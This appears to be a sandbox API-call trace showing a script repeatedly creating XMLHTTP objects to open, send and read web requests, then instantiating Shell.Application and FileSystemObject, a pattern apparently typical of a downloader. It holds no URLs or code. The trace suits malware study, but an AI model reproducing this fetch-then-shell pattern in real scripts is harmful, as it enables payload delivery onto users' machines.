	[0525.320] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0525.320] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0525.321] ??2@YAPEAX_K@Z () returned 0x62f330
	[0525.321] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0525.321] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.321] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0525.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0525.321] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0525.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.321] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.321] longjmp () 
	[0525.322] longjmp () 
	[0525.322] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.322] SysStringLen (param_1=0x0) returned 0x0
	[0525.322] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0525.322] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0525.322] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0525.322] ??2@YAPEAX_K@Z () returned 0x62f310
	[0525.322] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0525.322] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.322] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0525.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0525.322] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0525.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.323] longjmp () 
	[0525.323] longjmp () 
	[0525.323] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0525.323] SysStringLen (param_1=0x0) returned 0x0
	[0525.323] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0525.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0525.323] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0525.324] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0525.324] ??2@YAPEAX_K@Z () returned 0x62f330
	[0525.324] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0525.324] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0525.324] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.324] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0525.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0525.325] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0525.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0527.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0527.675] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0527.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0527.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0527.675] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0527.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0527.675] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0527.675] SysStringLen (param_1=0x0) returned 0x0
	[0527.675] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0527.676] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0527.676] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0527.676] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0527.676] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0527.676] ??2@YAPEAX_K@Z () returned 0x62f350
	[0527.676] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0527.676] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0527.676] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0527.676] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0527.676] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0527.676] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0527.676] SysStringLen (param_1=0x0) returned 0x0
	[0527.676] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0527.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0527.679] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0527.680] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0527.680] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0527.680] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0527.680] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0528.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0528.868] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0528.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0528.869] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.869] SysStringLen (param_1=0x0) returned 0x0
	[0528.869] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0528.870] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0528.870] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0528.870] ??2@YAPEAX_K@Z () returned 0x62f330
	[0528.870] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0528.870] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.870] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0528.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0528.870] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0528.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.870] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.873] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.873] SysStringLen (param_1=0x0) returned 0x0
	[0528.873] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
